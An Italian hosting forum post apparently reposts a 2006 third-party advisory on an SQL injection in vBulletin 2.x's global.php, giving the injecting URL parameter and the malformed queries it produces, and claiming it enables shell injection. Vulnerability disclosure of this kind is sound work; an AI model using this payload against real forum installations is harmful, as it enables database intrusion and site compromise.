Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità
Vbulletin 2.X sql injection Vbulletin 2.X sql injection
Registrazione FAQ Lista utenti Calendario Cerca I messaggi di oggi Segna forums come letti

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 26-09-2006, 19.32.54
Administrator
Amministratore
  
Data registrazione: 12-09-2002
Messaggi: 3,420
serverplan ha disabilitato la reputazione
Predefinito Vbulletin 2.X sql injection
Hello,,

Vbulletin 2.X sql injection

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

This is sql injection in vbulletin systems

the injection is in the global.php file

we can use it

global.php?templatesused=))/*

the query will be
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','use rname_loggedin','phpinclude','headinclude','header ','footer','forumjumpbit','forumjump','nav_linkoff ','nav_linkon','navbar','nav_joiner','pagenav','pa genav_curpage','pagenav_firstlink','pagenav_lastli nk','pagenav_nextlink','pagenav_pagelink','pagenav _prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

global.php?templatesused=nn,dd,'))/*
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','use rname_loggedin','phpinclude','headinclude','header ','footer','forumjumpbit','forumjump','nav_linkoff ','nav_linkon','navbar','nav_joiner','pagenav','pa genav_curpage','pagenav_firstlink','pagenav_lastli nk','pagenav_nextlink','pagenav_pagelink','pagenav _prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

It Can be used as shell injection

Tested on VB 2.3.X and other versions are injected ..(2.X)

#WwW.SoQoR.NeT
Rispondi citando
Rispondi

« Discussione precedente | Prossima discussione »
Strumenti discussione
Modalità visualizzazione
Modalità lineare Modalità lineare

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
Problema Server - Software vBulletin rave PHP 1 17-11-2007 13.33.35
Sql Injection in WordPress 2.1.3 serverplan Vulnerabilità 0 22-05-2007 21.24.21
SQL-injection in Ikonboard 3.1.x serverplan Vulnerabilità 0 16-12-2004 18.37.40
vBulletin PHP Forum Version serverplan Vulnerabilità 0 14-02-2004 13.56.46
SQL injection in Php-Nuke 7.1.0 serverplan Vulnerabilità 0 09-02-2004 22.05.30


Tutti gli orari sono GMT +1. Adesso sono le 15.31.12.

Contatta staff - Archivio - Inizio pagina

Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it